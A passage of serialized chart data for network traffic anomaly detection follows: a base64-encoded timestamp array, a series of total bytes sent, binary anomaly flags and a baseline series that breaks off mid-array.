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4geCsdkIAAODw46x2QgAAyF/nrHZCAACwzuqsdkIAAJg97qx2QgAAgKzxrHZCAABoG/WsdkIAAFCK+Kx2QgAAOPn7rHZCAAAgaP+sdkIAAAjXAq12QgAA8EUGrXZCAADYtAmtdkIAAMAjDa12QgAAqJIQrXZCAACQARStdkIAAHhwF612QgAAYN8arXZCAABITh6tdkIAADC9Ia12QgAAGCwlrXZCAAAAmyitdkIAAOgJLK12QgAA0HgvrXZCAAC45zKtdkIAAKBWNq12QgAAiMU5rXZCAABwND2tdkIAAFijQK12QgAAQBJErXZCAAAogUetdkIAABDwSq12QgAA+F5OrXZCAADgzVGtdkIAAMg8Va12QgAAsKtYrXZCAACYGlytdkIAAICJX612QgAAaPhirXZCAABQZ2atdkIAADjWaa12QgAAIEVtrXZCAAAItHCtdkIAAPAidK12QgAA2JF3rXZCAADAAHutdkIAAKhvfq12QgAAkN6BrXZCAAB4TYWtdkIAAGC8iK12QgAASCuMrXZCAAAwmo+tdkIAABgJk612QgAAAHiWrXZCAADo5pmtdkIAANBVna12QgAAuMSgrXZCAACgM6StdkIAAIiip612QgAAcBGrrXZCAABYgK6tdkIAAEDvsa12QgAAKF61rXZCAAAQzbitdkIAAPg7vK12QgAA4Kq/rXZCAADIGcOtdkIAALCIxq12QgAAmPfJrXZCAACAZs2tdkIAAGjV0K12QgAAUETUrXZCAAA4s9etdkIAACAi2612QgAACJHerXZCAADw/+GtdkIAANhu5a12QgAAwN3orXZCAACoTOytdkIAAJC77612QgAAeCrzrXZCAABgmfatdkIAAEgI+q12QgAAMHf9rXZCAAAY5gCudkIAAABVBK52QgAA6MMHrnZCAADQMguudkIAALihDq52QgAAoBASrnZCAACIfxWudkIAAHDuGK52QgAAWF0crnZCAABAzB+udkIAACg7I652QgAAEKomrnZCAAD4GCqudkIAAOCHLa52QgAAyPYwrnZCAACwZTSudkIAAJjUN652QgAAgEM7rnZCAABosj6udkIAAFAhQq52QgAAOJBFrnZCAAAg/0iudkIAAAhuTK52QgAA8NxPrnZCAADYS1OudkIAAMC6Vq52QgAAqClarnZCAACQmF2udkIAAHgHYa5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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[840]},\"TotalBytesSent\":[873713587,882187669,852506841,898793650,891598085,893022551,922677236,856663011,830763825,855292297,867265088,783423911,797876828,790012871,852519704,801772685,807320821,811995775,857108417,668803434,644214662,716435846,718165305,846441590,913851950,909281093,910496479,860491701,907134623,951830968,863445775,883803886,947731570,897928218,862303611,891357428,874557665,802427120,869716161,851558231,906453909,843625312,807469579,695427997,643948011,677938461,666457868,890567174,920136656,864647530,865802529,937646970,918357380,889610303,913645805,887186534,965532850,825807779,903819076,827999022,916732278,903529290,869875766,877268278,901985353,820902488,839550728,697140933,725116765,718391605,734634539,961618771,973519876,931452710,936782632,902828719,956018750,901050381,986348136,888182919,895773023,860244868,894638180,932630230,877076050,904708616,885212895,928834714,882928145,897273726,845388269,730597647,733994909,696100730,677795812,944003798,940124451,903070877,966821399,928572732,968103682,942345100,918154112,908724455,969661489,869552513,928906452,858754943,852800036,956027685,899862034,914327713,868670704,863683195,905245396,698524204,751378763,788098393,718327017,457637899,407128034,427965408,416582611,405735621,475934081,391911247,382779518,418150700,439492547,344212429,385151272,402634638,348130418,330143017,412007535,354978767,383963655,426783985,402920595,216671778,186952988,256555183,237640219,459615281,450916734,439791726,407339745,460514032,473271204,42271963,452867549,433833905,412908587,399529976,351788448,357793541,420058661,388618694,344244340,384677308,350548288,433051287,434604199,227336212,181142300,225420990,242379095,1022669703,953364734,1033085221,969714599,1013729943,981345529,1037288750,991165062,984493550,978367044,938879683,955831823,905906975,957606717,929509010,1002659157,935735110,930332470,956107825,984858191,855085656,753446631,806497013,799747641,1026442326,1077848994,1042074279,989569304,1057453529,1057338096,1067745732,1039937078,634395781,1038853034,988661138,971145433,1020524701,1023040605,1026067148,974899180,925481646,1008014066,978065792,976248064,788591993,819890342,776408096,826110086,1034936595,1039212114,1022464025,1075642770,1055035913,1061634536,1076072442,1061904372,1051809129,1055544997,1039038521,946540104,982693333,1040505474,963020903,1017382900,974943158,986877436,977686629,946411386,818997628,799954180,862299582,836341534,1025090070,1007907120,1027324682,1016950649,1090135061,1066631292,1087552149,1011146902,1096276461,1053690335,1026041317,995544290,964045673,1007207382,976018535,1044530213,1056525176,1009998583,1020296930,996836955,858490388,830213157,845167877,837203412,1100015423,1074240368,1085046504,1119540427,1066062542,1111993335,1074743022,1075393902,1096429594,1104942722,1043375756,1004789142,1009115136,1036882213,998556234,1061527144,1059037422,982935955,1070078489,1074805675,823993813,845965247,908350645,909155856,594596972,588339826,513974580,498608477,564220831,526136510,537404241,503702057,562529456,565679688,446033781,493641472,916767394,467545424,466436663,459461022,486413184,538919515,494288347,503115084,338429270,376607397,335536198,305752110,579716989,607277895,580925641,591887341,535053510,542852243,600980027,572841825,610227565,597944660,478582894,533450021,523528503,483109880,575159745,542252387,545441292,575681208,566276013,572591706,353152221,351089795,402680601,398099696,1124558087,1094578207,1149602244,1127141868,1188500821,1171529151,1137436272,1134543931,1102054311,1085571380,1079571807,1085991361,1056982073,1133881950,1064259706,1083322471,1110532757,1116891783,1069608690,1138721940,891550671,930699055,913962202,880548252,1163276194,1118538836,1134609747,1197648313,1140866762,1124279760,1202915026,1156873076,1189829422,1190081828,1089603867,1150060587,1067572234,1077762137,1101599618,1125614650,1054136082,1160099162,1097202834,1140124125,999404394,930962307,984346459,989561872,1212679768,1143875331,1175140739,1136172485,1216091392,1166238768,1213483016,1141226357,1142413009,1202291677,1096804116,1103237642,1136332093,1078214113,1082330918,1105565630,1555286702,1170305747,1081316124,1105199753,921977750,983638609,994542648,963769124,1181536839,1201880958,1221525336,1183995519,1230322064,1155522276,1188888461,1145193164,1155701298,1188033929,1085635585,1119451105,1174983532,1189287942,1104109113,1112397263,1187541501,1132189425,1176740195,1193123726,997973374,987071459,1016780205,1022792246,1259584702,1171617419,1201434219,1197268131,1246202606,1193402296,1179520250,1229313145,1242054018,1213590384,1211392931,1210114874,1143940643,1125394273,1108593833,1155662210,1163561397,1163391090,1158459579,1146162232,1012664439,1006936386,1032638042,964323187,726832364,673815250,673077290,683083834,641410712,728453985,641745207,704815291,726998848,657695371,652574108,613671163,603748816,638653988,662712107,597580224,605047075,662654036,608539632,688872417,514920636,447879593,510485297,484271754,676461315,660568258,702440857,675871159,725286517,670973900,727885782,744687972,675085296,651879749,665241172,627295101,683310114,607687695,667111982,646866052,655118217,614153533,703929185,687145906,491031685,475837204,527835918,536374191,1233566650,1302272008,1289104217,1281107991,1278953301,1232111868,1294651802,1240461427,1305202257,1296015157,1265505042,1203512594,1255884232,1231314521,1186407921,1166835959,1205765612,1166356313,1223852614,1269667059,1041230333,1108569577,1032000916,1055812151,1234663961,1293752411,1312405451,1272792567,1244937177,1228548121,1246364826,1327024928,1243726839,1246608903,1266850172,1250452305,1236222417,1261777865,1241712737,1188691842,1290406309,1237931166,1286266734,1254724526,1024325551,1129096497,1094744542,1106153922,1271645012,1347794452,1351655119,1334942686,1251176674,1269615109,1344451748,1314975114,1337578152,1348381350,1299125075,1261105761,1295117140,1275566823,1218600630,1205956592,1228909763,1280308251,1293029712,1209380432,1119365150,1060920766,1061436742,1094057836,1338597036,1313165433,1363214977,1291210639,1301482144,1298243874,1324592383,1346187572,1346602309,1307023171,1246832320,1320019656,1322110891,1289406441,1245116093,1233689715,1246103258,1282225691,1324849514,1264425198,1085445814,1103826656,1135021543,1093951930,1768911488,1344644367,1325119826,1352683245,1388311605,1386178294,1314885144,1390097286,1340372349,1308315998,1248477459,1307770976,1277794700,1301026627,1275879844,1337627540,1266847511,1250826284,1250775463,1303065742,1083159258,1075790124,1124244637,1142869516,844634233,831852994,858119325,756699030,859346504,782955826,766149662,820109225,843569927,862042352,772626268,741265353,752637777,711080800,787329634,760437876,775861416,707501549,786003450,782503059,651765460,613346276,641089364,588356946,825822420,820488600,839810018,816681132,806727645,862121762,850428593,833831322,837988090,882639328,812175783,788758153,736528580,763329213,782038749,792206615,812923462,737361821,808975990,806454559,654882781,595837479,615062385,605973282,1368926432,1355926496,1348926724,1337306282,1410566043,1341735073,1343795224,1435220844,1379367502,1384310206,1365457344,1360152030,1366919111,1376774721,1338677133,1379408603,1326759966,1337344137,1365622686,1390260265,1162133464,1191190594,1172019258,1209471254,1418034087,1363742046,1425275938,1432759288,1380549618,1398671177,1405068973,1385686319,1409991781,1447319641,1380666340,1333216667,1322760361,1398705231,1315549876,1356737170,1394306054,1322876966,1353514970,1333873537,1226651039,1255761136,1231513058,1168746496,1416639066,1427112735,1461381214,1412016648,1447531904,1477902019,1394862023,1477340485,1483015065,1443581624,1404994511,1326704915,1405705118,1432086031,1349510015,1372709257,1426258965,1400670563,1393785274,1360268291,1227162238,1260832816,1263051135,1269304066,1442954939,1495282173,1489786658,1448466267,1480962739,1398602833,1469105751,1468864803,1412196168,1400145473,1439154948,1441755515,1451670670,1414405345,1361733906,1389770777,1389767204,1357535607,1412196256,1361244164,1214116379,1218696527,1236011876,1258844480,1471186871,1407500147,1505744090,1475423157,1480762935,1503614110,1496402547,1417036285,1437493594,1493592827,1436181558,1441047945,993152841,1453223308,1373485407,1471798370,1419431171,1453799427,1372937500,1379938036,1284457376,1287902888,1236144771,1261400942,960208787,939095822,930978685,944830098,925097517,986308242,919493841,927218360,971499707,955771283,834582332,852630670,874504602,914012315,834761544,908744348,853162780,922265182,859919693,930111090,737693868,722223752,758772577,706415711,994897470,974844971,916462999,965722723,913345256,900491348,917100812,905215807,910648863,1008418310,900965862,870174355,876299048,878786944,874525847,953351422,961309357,910212834,913189663,946670363,754488773,762510726,746115005,744582340,1469756566],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[885329547,884137911,859469258,884708691,886401701,907704753,893996748,859030090,871961185,860212543,855785334,806594000,826047534,778593114,840751969,800300208,832580735,794806795,808622712,654523858,617036216,668087855,673783442,883105643,920608590,906293918,896188115,909840496,921583246,924397144,920946390,885101821,910645996,871423280,883479285,845372092,858022044,832753761,866639081,846494697,864602424,830698215,836189661,686903306,667874827,700820155,698504802,884263627,915199451,890288444,894926763,895553052,919664214,906923577,911964069,880881992,921133753,860407900,890665853,867416996,875031717,875679249,888872158,889525280,897542572,872274369,873046289,728145532,727801947,748799083,739028823,893933971,918282323,885830597,904668887,899157118,933141584,901504940,918557529,889464450,939001637,856323862,905878497,888321405,891085330,917973276,909361619,925203772,920395167,905887129,905940485,759196050,778362888,791121291,774640787,892535985,889005775,871541165,890180507,884740326,930824061,844513069,902026466,878666389,907786768,827040226,861628671,842276769,819399963,837463052,818534673,811778594,780005138,779030217,758457512,571277658,561897608,568217257,525866782,660930399,621512348,603077749,586348085,572602832,593066772,437120849,523152874,501763312,505155602,428760405,437025273,413772445,402633409,407450465,403380725,392817527,370823494,403387263,402601706,216579646,198497601,239637112,217198071,462649524,433513807,448308349,420751274,447793862,466118933,335573055,437134350,401809830,451964654,405700827,419691046,421153421,449488451,452071907,482240771,473406768,488919645,542859922,565144316,402079162,380685801,441400022,454951100,806100855,809768646,838213155,819402581,876581608,894373410,811167139,908407242,813762458,925172036,897209825,889351344,901880603,938989680,917421284,928979993,897143763,910131569,931028120,929241963,754089094,710473117,733178497,737894587,1091773829,1081442032,1082397634,1054754054,1087278537,1073976214,1048385273,1052760618,932983908,1036495461,998066848,960505583,963618778,998439498,961959163,978900178,938985436,953872019,956850668,951878928,796084262,765359547,787012914,792273834,1061401584,1059974246,1057910598,1051874996,1078748961,1073429552,1084959210,1047229268,961503359,1053835725,1017662681,975675644,985527414,1021628361,985721470,1019932015,992020347,997552480,1002367379,991577702,834748439,823552379,847181504,851339632,1019185277,1014798684,1009403799,1023786590,1041053771,1046192627,1051224660,1022892098,1019208770,1055201606,1015066963,980991509,1035269389,1030886173,998634100,1048888067,1044910728,1034925145,1056653807,1049976584,884090231,889630827,923309726,922351199,1019571020,1015009271,1005317387,1020446628,1037887551,1040930056,1048886235,1018407439,1064307316,1054263159,981857654,966144956,1063306597,960006996,931612771,955612287,947735923,917410466,916729922,896190641,695728897,686203056,692513777,663775338,786514225,764400303,730509096,718521094,706701902,689844560,681762010,642160381,664895102,645218452,548277161,551944187,655437109,526101341,521776940,529949643,536827983,532411052,533221027,541478998,334104323,350799041,367850241,354080137,592861875,584413154,574675261,578263791,584358664,577080701,594743584,576672668,604906249,605670853,531279139,572731132,673925923,582503596,602101630,617998186,639618299,681151556,672521794,714628782,522623522,553117370,580700510,579863744,938153824,933787384,958762026,981821836,1000522615,999720668,1045217564,1028142483,1055015674,1064275747,992923540,1037430098,1057157529,1025225255,1038143387,1044282284,1082088576,1083995723,1035728443,1067656867,864939128,862970273,876664348,855688341,1224016013,1185142366,1205752436,1200032734,1213513001,1179534069,1209269209,1164267664,1165267810,1173406045,1088928353,1113854539,1091479906,1092627046,1079723158,1091707601,1198336280,1126499364,1074602093,1110899154,916786204,919987868,940347811,923935912,1211080739,1171622993,1196553335,1187514285,1217113271,1170782979,1206811928,1166492624,1174953032,1195175012,1111446397,1137584470,1130470398,1125933450,1102992613,1125078812,1259512902,1163781639,1129809487,1159252450,984217754,986695573,1013746520,999237958,1185727281,1143020609,1167219462,1154079791,1192072490,1153049225,1172409849,1158244070,1173246942,1187069311,1123405150,1141030313,1144199644,1138606311,1121561435,1144022823,1282818305,1190868573,1174187169,1200477911,1038001850,1041844377,1077489949,1057771424,1168244039,1132023852,1158468046,1149028728,1181985931,1163445465,1158970780,1174081926,1179128370,1163326246,1122342601,1112167290,1106636230,1091650674,1066956753,1054125830,1110011949,1053430333,1034235346,1040105751,852615362,818811687,839263959,795415820,912033186,862500590,864893216,839116415,840833873,810581543,791136616,801885323,787209644,743150679,718902237,683512414,678621202,654447905,651523063,632137334,644699763,637307132,650946037,670946304,493017416,473462282,506372199,486350132,700921380,697517504,7